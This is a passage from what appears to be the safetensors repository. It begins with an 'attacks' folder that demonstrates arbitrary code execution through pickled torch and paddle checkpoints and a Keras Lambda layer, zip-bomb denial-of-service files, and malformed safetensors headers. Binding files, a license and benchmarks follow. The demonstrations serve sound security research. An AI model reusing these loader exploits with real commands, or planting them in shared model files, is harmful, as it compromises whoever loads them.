20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`)
21 | 
22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file.
23 | ```
24 | python tf_ace_create.py
25 | python tf_ace_get_pwned.py
26 | ```
27 | 
28 | # Torch Denial of Service (OOM kills the running process)
29 | 
30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file.
31 | ```
32 | python torch_dos_create.py
33 | python torch_dos_get_pwned.py
34 | ```
35 | 
36 | # Numpy Denial of Service (OOM kills the running process)
37 | 
38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file.
39 | ```
40 | python numpy_dos_create.py
41 | python numpy_dos_get_pwned.py
42 | ```
43 | 
44 | # Safetensors abuse attempts
45 | 
46 | In order to try to check the limits, we also try to abuse the current format.
47 | Please send ideas!
48 | 
49 | A few things can be abused:
50 | - Proposal 1: The initial 8 bytes, which could claim a size too big with regards to the file. This crashes, and crashes early (out of bounds) (Attempt #1).
51 | - Proposal 2: The initial header is JSON; an attacker could use a 4GB JSON file to delay the loads. It's debatable how much of an attack this is, but at least
52 |   it's impossible to "bomb" (unlike the DOS attacks above, where the file is vastly smaller than its expanded version, because of zip abuse).
53 |   Various "protections" could be put in place, like a cap on the header proportion (the header should always be a tiny fraction of the size of the file). (Attempt #2)
54 | - Proposal 3: The offsets could be negative, or point out of the file. This all crashes by default.
55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok.
56 |   While testing Proposal 2, I realized that the tensors themselves were all allocated, which gave me an idea for a DOS exploit: a relatively small
57 |   file (a few megs tops) defining many tensors on the same overlapping part of the file was essentially a DOS attack. The mitigation is rather simple: we validate
58 |   that the offsets are contiguous and non-overlapping. A sketch of this is shown after the commands below.
59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This is validated against.
60 | - Proposal 6: The file being mmapped could be modified while it's opened (but if an attacker has access to your filesystem, it seems like you're already pwned).
61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). That doesn't mean there isn't a flaw. The same goes for the actual compiled Rust binary.
62 | 
63 | ```
64 | python safetensors_abuse_attempt_1.py
65 | python safetensors_abuse_attempt_2.py
66 | python safetensors_abuse_attempt_3.py
67 | ```
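To make Proposal 4 concrete, here is a small hand-rolled sketch (not one of the scripts above; the filename is made up) that builds a file whose tensors all claim the same byte range. Current `safetensors` rejects it at load time, because offsets must be contiguous and non-overlapping:

```python
import json

from safetensors.torch import load_file

filename = "overlap_attempt.safetensors"

shape = [1000, 1000]
n = shape[0] * shape[1] * 4  # byte size of a single F32 tensor

# 100 tensors, all pointing at the exact same byte range.
header = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(100)}
binary = json.dumps(header).encode("utf-8")

with open(filename, "wb") as f:
    f.write(len(binary).to_bytes(8, "little"))
    f.write(binary)
    f.write(b"\0" * n)  # ~4MB on disk, ~400MB if naively materialized

try:
    load_file(filename)
except Exception as e:
    print(f"Rejected as expected: {e}")
```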
-------------------------------------------------------------------------------- /attacks/numpy_dos_create.py: --------------------------------------------------------------------------------
1 | from zipfile import ZIP_DEFLATED, ZipFile
2 | 
3 | FILESIZE = 40 * 1000  # number of 1 MB buffers, i.e. 40 GB once decompressed
4 | BUFFER = b"\0" * 1000 * 1000  # 1 MB
5 | 
6 | outfilename = "numpy_dos.npz"
7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
8 |     with outzip.open("weights.npy", "w", force_zip64=True) as f:
9 |         for i in range(FILESIZE):
10 |             f.write(BUFFER)
-------------------------------------------------------------------------------- /attacks/numpy_dos_get_pwned.py: --------------------------------------------------------------------------------
1 | import os
2 | 
3 | import numpy as np
4 | 
5 | filename = "numpy_dos.npz"
6 | 
7 | print(
8 |     f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} MB so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | archive = np.load(filename)
13 | weights = archive["weights"]  # npz entries are keyed by filename minus the .npy extension
14 | assert np.allclose(weights, np.zeros((2, 2)))
15 | print("The file looks fine !")
-------------------------------------------------------------------------------- /attacks/paddle_ace_create.py: --------------------------------------------------------------------------------
1 | import paddle
2 | import numpy as np
3 | from collections import OrderedDict
4 | 
5 | def _parse_every_object(obj, condition_func, convert_func):
6 |     if condition_func(obj):
7 |         return convert_func(obj)
8 |     elif isinstance(obj, (dict, OrderedDict, list)):
9 |         if isinstance(obj, list):
10 |             keys = range(len(obj))
11 |         else:
12 |             keys = list(obj.keys())
13 |         for key in keys:
14 |             if condition_func(obj[key]):
15 |                 obj[key] = convert_func(obj[key])
16 |             else:
17 |                 obj[key] = _parse_every_object(
18 |                     obj[key], condition_func, convert_func
19 |                 )
20 |         return obj
21 |     elif isinstance(obj, tuple):
22 |         return tuple(
23 |             _parse_every_object(list(obj), condition_func, convert_func)
24 |         )
25 |     elif isinstance(obj, set):
26 |         return set(_parse_every_object(list(obj), condition_func, convert_func))
27 |     else:
28 |         return obj
29 | 
30 | # hack the _parse_every_object method
31 | paddle.framework.io._parse_every_object = _parse_every_object
32 | 
33 | class BadDict(dict):
34 |     def __init__(self, src: str, **kwargs):
35 |         super().__init__(**kwargs)
36 |         self.src = src
37 | 
38 |     def __reduce__(self):
39 |         return (
40 |             eval,
41 |             (f"os.system('{self.src}') or dict()",),
42 |             None,
43 |             None,
44 |             iter(self.items()),
45 |         )
46 | 
47 | paddle.save(
48 |     [BadDict(
49 |         'echo "pwned your computer, I can do anything I want."',
50 |         **{"weight": paddle.zeros((2, 2))},
51 |     )],
52 |     "paddle_ace.pdparams",
53 | )
-------------------------------------------------------------------------------- /attacks/paddle_ace_get_pwned.py: --------------------------------------------------------------------------------
1 | import paddle
2 | 
3 | weights = paddle.load("paddle_ace.pdparams")[0]
4 | assert list(weights.keys()) == ["weight"]
5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2)))
6 | print("The file looks fine !")
-------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_1.py: --------------------------------------------------------------------------------
1 | import torch
2 | from safetensors.torch import load_file, save_file
3 | 
4 | filename = "safetensors_abuse_attempt_1.safetensors"
5 | 
6 | 
7 | def create_payload():
8 |     weights = {"weight": torch.zeros((2, 2))}
9 |     save_file(weights, filename)
10 | 
11 |     with open(filename, "r+b") as f:
12 |         f.seek(0)
13 |         # Overwrite the header size: claim 1000 header bytes even though the file is much smaller
14 |         n = 1000
15 |         n_bytes = n.to_bytes(8, "little")
16 |         f.write(n_bytes)
17 | 
18 | 
19 | create_payload()
20 | # This properly crashes with an out of bounds exception.
21 | test = load_file(filename)
-------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_2.py: --------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 | 
5 | from safetensors.torch import load_file
6 | 
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 | 
9 | 
10 | def create_payload():
11 |     shape = [2, 2]
12 |     n = shape[0] * shape[1] * 4
13 | 
14 |     metadata = {
15 |         f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10)
16 |     }
17 | 
18 |     binary = json.dumps(metadata).encode("utf-8")
19 |     n = len(binary)
20 |     n_header = n.to_bytes(8, "little")
21 | 
22 |     with open(filename, "wb") as f:
23 |         f.write(n_header)
24 |         f.write(binary)
25 |         f.write(b"\0" * n)
26 | 
27 | 
28 | create_payload()
29 | 
30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000 / 1000} MB")
31 | start = datetime.datetime.now()
32 | test = load_file(filename)
33 | print(f"Loading the file took {datetime.datetime.now() - start}")
-------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_3.py: --------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 | 
5 | from safetensors.torch import load_file
6 | 
7 | filename = "safetensors_abuse_attempt_3.safetensors"
8 | 
9 | 
10 | def create_payload():
11 |     shape = [200, 200]
12 |     n = shape[0] * shape[1] * 4
13 | 
14 |     metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)}
15 | 
16 |     binary = json.dumps(metadata).encode("utf-8")
17 |     n = len(binary)
18 |     n_header = n.to_bytes(8, "little")
19 | 
20 |     with open(filename, "wb") as f:
21 |         f.write(n_header)
22 |         f.write(binary)
23 |         f.write(b"\0" * n)
24 | 
25 | 
26 | create_payload()
27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000 / 1000} MB")
28 | start = datetime.datetime.now()
29 | test = load_file(filename)
30 | print(f"Loading the file took {datetime.datetime.now() - start}")
-------------------------------------------------------------------------------- /attacks/tf_ace_create.py: --------------------------------------------------------------------------------
1 | import tensorflow as tf
2 | 
3 | 
4 | def exec_(*args, **kwargs):
5 |     import os
6 | 
7 |     os.system('echo "########################################\nI own you.\n########################################"')
8 |     return 10
9 | 
10 | 
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 | 
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 | 
16 | 
17 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
18 | 
19 | model.save("tf_ace.h5")
-------------------------------------------------------------------------------- /attacks/tf_ace_get_pwned.py: --------------------------------------------------------------------------------
1 | import base64
2 | import json
3 | 
4 | import h5py
5 | import tensorflow as tf
6 | 
7 | new_model = tf.keras.models.load_model("tf_ace.h5")
8 | 
9 | print("Transformers is not vulnerable to this, as it uses h5 directly.")
10 | print("Keras stores marshalled code of the function within the `h5` attrs of the file")
11 | print("Let's show you the marshalled code")
12 | 
13 | with h5py.File("tf_ace.h5") as f:
14 |     data = json.loads(f.attrs["model_config"])
15 |     print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0]))
-------------------------------------------------------------------------------- /attacks/tf_safe_ace_create.py: --------------------------------------------------------------------------------
1 | import tensorflow as tf
2 | 
3 | 
4 | def exec_(*args, **kwargs):
5 |     import os
6 | 
7 |     os.system('echo "########################################\nI own you.\n########################################"')
8 |     return 10
9 | 
10 | 
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 | 
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 | 
16 | 
17 | model.save("tf_ace.keras", save_format="keras_v3")
-------------------------------------------------------------------------------- /attacks/tf_safe_ace_get_pwned.py: --------------------------------------------------------------------------------
1 | import tensorflow as tf
2 | 
3 | new_model = tf.keras.models.load_model("tf_ace.keras")
-------------------------------------------------------------------------------- /attacks/torch_ace_create.py: --------------------------------------------------------------------------------
1 | import torch
2 | 
3 | 
4 | class BadDict(dict):
5 |     def __init__(self, src: str, **kwargs):
6 |         super().__init__(**kwargs)
7 |         self.src = src
8 | 
9 |     def __reduce__(self):
10 |         return (
11 |             eval,
12 |             (f"os.system('{self.src}') or dict()",),
13 |             None,
14 |             None,
15 |             iter(self.items()),
16 |         )
17 | 
18 | 
19 | torch.save(
20 |     BadDict(
21 |         'echo "pwned your computer, I can do anything I want."',
22 |         **{"weight": torch.zeros((2, 2))},
23 |     ),
24 |     "torch_ace.pt",
25 | )
-------------------------------------------------------------------------------- /attacks/torch_ace_get_pwned.py: --------------------------------------------------------------------------------
1 | import torch
2 | 
3 | weights = torch.load("torch_ace.pt")
4 | assert list(weights.keys()) == ["weight"]
5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
6 | print("The file looks fine !")
-------------------------------------------------------------------------------- /attacks/torch_dos_create.py: --------------------------------------------------------------------------------
1 | import os
2 | from zipfile import ZIP_DEFLATED, ZipFile
3 | 
4 | import torch
5 | 
6 | FILESIZE = 40 * 1000  # number of 1 MB buffers, i.e. 40 GB once decompressed
7 | BUFFER = b"\0" * 1000 * 1000  # 1 MB
8 | 
9 | filename = "torch_dos_tmp.pt"
10 | torch.save({"weight": torch.zeros((2, 2))}, filename)
11 | 
12 | 
13 | with ZipFile(filename, "r") as torch_zip:
14 |     outfilename = "torch_dos.pt"
15 |     with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
16 |         outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read())
17 |         outzip.writestr("archive/version", torch_zip.open("archive/version").read())
18 |         with outzip.open("archive/data/0", "w", force_zip64=True) as f:
19 |             for i in range(FILESIZE):
20 |                 f.write(BUFFER)
21 | 
22 | os.remove(filename)
-------------------------------------------------------------------------------- /attacks/torch_dos_get_pwned.py: --------------------------------------------------------------------------------
1 | import os
2 | 
3 | import torch
4 | 
5 | filename = "torch_dos.pt"
6 | 
7 | print(
8 |     f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} MB so it should be fine."
9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | weights = torch.load(filename) 13 | assert list(weights.keys()) == ["weight"] 14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /bindings/python/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | .pytest_cache/ 6 | *.py[cod] 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | .venv/ 14 | env/ 15 | bin/ 16 | build/ 17 | develop-eggs/ 18 | dist/ 19 | eggs/ 20 | lib/ 21 | lib64/ 22 | parts/ 23 | sdist/ 24 | var/ 25 | include/ 26 | man/ 27 | venv/ 28 | *.egg-info/ 29 | .installed.cfg 30 | *.egg 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | pip-selfcheck.json 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | 45 | # Translations 46 | *.mo 47 | 48 | # Mr Developer 49 | .mr.developer.cfg 50 | .project 51 | .pydevproject 52 | 53 | # Rope 54 | .ropeproject 55 | 56 | # Django stuff: 57 | *.log 58 | *.pot 59 | 60 | .DS_Store 61 | 62 | # Sphinx documentation 63 | docs/_build/ 64 | 65 | # PyCharm 66 | .idea/ 67 | 68 | # VSCode 69 | .vscode/ 70 | 71 | # Pyenv 72 | .python-version -------------------------------------------------------------------------------- /bindings/python/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-python" 3 | version = "0.5.3-dev.0" 4 | edition = "2021" 5 | rust-version = "1.74" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | [lib] 9 | name = "safetensors_rust" 10 | crate-type = ["cdylib"] 11 | 12 | [dependencies] 13 | pyo3 = { version = "0.24", features = ["abi3", "abi3-py38"] } 14 | memmap2 = "0.9" 15 | serde_json = "1.0" 16 | 17 | [dependencies.safetensors] 18 | path = "../../safetensors" 19 | -------------------------------------------------------------------------------- /bindings/python/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 
25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. 
If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. 
Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 
202 | -------------------------------------------------------------------------------- /bindings/python/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include Cargo.toml 2 | include pyproject.toml 3 | include rust-toolchain 4 | include ../../LICENSE 5 | recursive-include src * 6 | recursive-include safetensors-lib * 7 | recursive-exclude safetensors-lib/target * 8 | -------------------------------------------------------------------------------- /bindings/python/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples 2 | 3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!) 4 | export PYTHONPATH = src 5 | 6 | check_dirs := tests py_src 7 | 8 | modified_only_fixup: 9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs))) 10 | @if test -n "$(modified_py_files)"; then \ 11 | echo "Checking/fixing $(modified_py_files)"; \ 12 | black --preview $(modified_py_files); \ 13 | isort $(modified_py_files); \ 14 | flake8 $(modified_py_files); \ 15 | else \ 16 | echo "No library .py files were modified"; \ 17 | fi 18 | 19 | 20 | quality: 21 | black --check --preview $(check_dirs) 22 | isort --check-only $(check_dirs) 23 | flake8 $(check_dirs) 24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source 25 | 26 | style: 27 | black --preview $(check_dirs) 28 | isort $(check_dirs) 29 | 30 | # Super fast fix and check target that only works on relevant modified files since the branch was made 31 | 32 | fixup: modified_only_fixup 33 | 34 | test: 35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/ 36 | -------------------------------------------------------------------------------- /bindings/python/README.md: -------------------------------------------------------------------------------- 1 | ## Installation 2 | 3 | ``` 4 | pip install safetensors 5 | ``` 6 | 7 | 8 | ## Usage 9 | 10 | ### Numpy 11 | 12 | ```python 13 | from safetensors.numpy import save_file, load_file 14 | import numpy as np 15 | 16 | tensors = { 17 | "a": np.zeros((2, 2)), 18 | "b": np.zeros((2, 3), dtype=np.uint8) 19 | } 20 | 21 | save_file(tensors, "./model.safetensors") 22 | 23 | 24 | # Now loading 25 | loaded = load_file("./model.safetensors") 26 | ``` 27 | 28 | ### Torch 29 | 30 | ```python 31 | from safetensors.torch import save_file, load_file 32 | import torch 33 | 34 | tensors = { 35 | "a": torch.zeros((2, 2)), 36 | "b": torch.zeros((2, 3), dtype=torch.uint8) 37 | } 38 | 39 | save_file(tensors, "./model.safetensors") 40 | 41 | 42 | # Now loading 43 | loaded = load_file("./model.safetensors") 44 | ``` 45 | 46 | ### Developing 47 | 48 | ``` 49 | # inside ./safetensors/bindings/python 50 | pip install .[dev] 51 | ``` 52 | Should be enough to install this library locally. 
53 | 54 | ### Testing 55 | 56 | ``` 57 | # inside ./safetensors/bindings/python 58 | pip install .[dev] 59 | pytest -sv tests/ 60 | ``` 61 | -------------------------------------------------------------------------------- /bindings/python/benches/test_flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import jax.numpy as jnp 5 | from flax.serialization import msgpack_restore, msgpack_serialize 6 | from safetensors.flax import load_file, save_file 7 | 8 | 9 | def create_gpt2(n_layers: int): 10 | tensors = {} 11 | tensors["wte"] = jnp.zeros((50257, 768)) 12 | tensors["wpe"] = jnp.zeros((1024, 768)) 13 | for i in range(n_layers): 14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,)) 15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,)) 16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024)) 17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304)) 18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304)) 19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768)) 20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768)) 21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768)) 22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768)) 23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072)) 24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072)) 25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768)) 26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768)) 27 | tensors["ln_f.weight"] = jnp.zeros((768)) 28 | tensors["ln_f.bias"] = jnp.zeros((768)) 29 | return tensors 30 | 31 | 32 | def load(filename): 33 | with open(filename, "rb") as f: 34 | data = f.read() 35 | flax_weights = msgpack_restore(data) 36 | return flax_weights 37 | 38 | 39 | def test_flax_flax_load(benchmark): 40 | # benchmark something 41 | weights = create_gpt2(12) 42 | with tempfile.NamedTemporaryFile(delete=False) as f: 43 | serialized = msgpack_serialize(weights) 44 | f.write(serialized) 45 | result = benchmark(load, f.name) 46 | os.unlink(f.name) 47 | 48 | for k, v in weights.items(): 49 | tv = result[k] 50 | assert jnp.allclose(v, tv) 51 | 52 | 53 | def test_flax_sf_load(benchmark): 54 | # benchmark something 55 | weights = create_gpt2(12) 56 | with tempfile.NamedTemporaryFile(delete=False) as f: 57 | save_file(weights, f.name) 58 | result = benchmark(load_file, f.name) 59 | os.unlink(f.name) 60 | 61 | for k, v in weights.items(): 62 | tv = result[k] 63 | assert jnp.allclose(v, tv) 64 | -------------------------------------------------------------------------------- /bindings/python/benches/test_mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | import tempfile 4 | 5 | 6 | if platform.system() == "Darwin": 7 | import mlx.core as mx 8 | from safetensors.mlx import load_file, save_file 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = mx.zeros((50257, 768)) 13 | tensors["wpe"] = mx.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768)) 23 | 
